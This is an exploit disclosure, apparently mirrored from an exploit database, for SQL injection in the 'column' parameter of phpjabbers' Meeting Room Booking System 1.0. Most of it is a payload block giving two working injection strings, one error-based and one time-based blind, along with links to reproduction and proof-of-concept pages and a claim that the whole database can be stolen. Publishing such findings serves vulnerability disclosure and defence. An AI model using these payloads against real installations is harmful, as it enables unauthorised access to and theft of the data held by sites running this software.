Share
## https://sploitus.com/exploit?id=1337DAY-ID-39044
## Title: Meeting Room Booking System-1.0 Multiple - SQLi
## Author: nu11secur1ty
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/meeting-room-booking-system/#sectionDemo
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The column parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the column parameter, and a database error message was returned. The attacker easily can steal all information from the database of this web application!
WARNING! All of you: Be careful what you buy! This will be your responsibility!

STATUS: HIGH-CRITICAL Vulnerability

[+]Payload:
```mysql
---
Parameter: column (GET)
    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
    Payload: controller=pjFront&action=pjActionRooms&locale=1&index=2467&column=(SELECT 6118 FROM(SELECT COUNT(*),CONCAT(0x716a717171,(SELECT (ELT(6118=6118,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&direction=ASC&page=1

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: controller=pjFront&action=pjActionRooms&locale=1&index=2467&column=(CASE WHEN (6735=6735) THEN SLEEP(5) ELSE 6735 END)&direction=ASC&page=1
---

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Meeting-Room-Booking-System-1.0)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/09/meeting-room-booking-system-10-multiple.html)

## Time spent:
01:47:00